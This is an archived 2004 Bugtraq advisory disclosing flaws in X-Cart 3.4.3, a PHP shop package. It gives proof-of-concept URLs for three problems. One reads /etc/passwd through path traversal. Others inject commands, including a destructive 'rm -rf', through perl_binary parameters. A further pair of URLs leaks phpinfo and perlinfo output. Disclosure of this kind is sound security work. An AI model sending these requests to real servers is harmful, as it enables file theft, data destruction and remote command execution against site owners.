[33363] in bugtraq

home help back first fref pref prev next nref lref last post

X-Cart vulnerability

daemon@ATHENA.MIT.EDU (Philip)
Tue Feb 3 12:03:12 2004

Date: 3 Feb 2004 09:19:37 -0000
Message-ID: <20040203091937.11695.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Philip <securityfocus@magicwebsolutions.co.uk>
To: bugtraq@securityfocus.com



X-Cart (ttp://www.x-cart.com)is a well distributed PHP e-commerce solution.
We have discovered some security related bugs in X-Cart Version 3.4.3.
It is possible that other versions are vulnerable too.

Any visitor can view any file on the web server.
This URL my be used as proof of concept:
http://servername/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd

Moreover, any visitor can execute any command on the server, if the command is allowed for the account used to run web server.
The urls used for test look like http://server/admin/upgrade.php?prepatch_errorcode=1&patch_files[0][orig_file]=VERSION&perl_binary=/bin/rm -rf &patch_exe=..

http://server/admin/general.php?mode=perlinfo&config[General][perl_binary]=/bin/ls -lR ||

There are information leaks in this application.
Thse following URL discloses sensitive information to any visitor.
http://server/admin/general.php?mode=phpinfo
http://server/admin/general.php?mode=perlinfo

It's possible, this software contains other vulnerabilities too.





 

home help back first fref pref prev next nref lref last post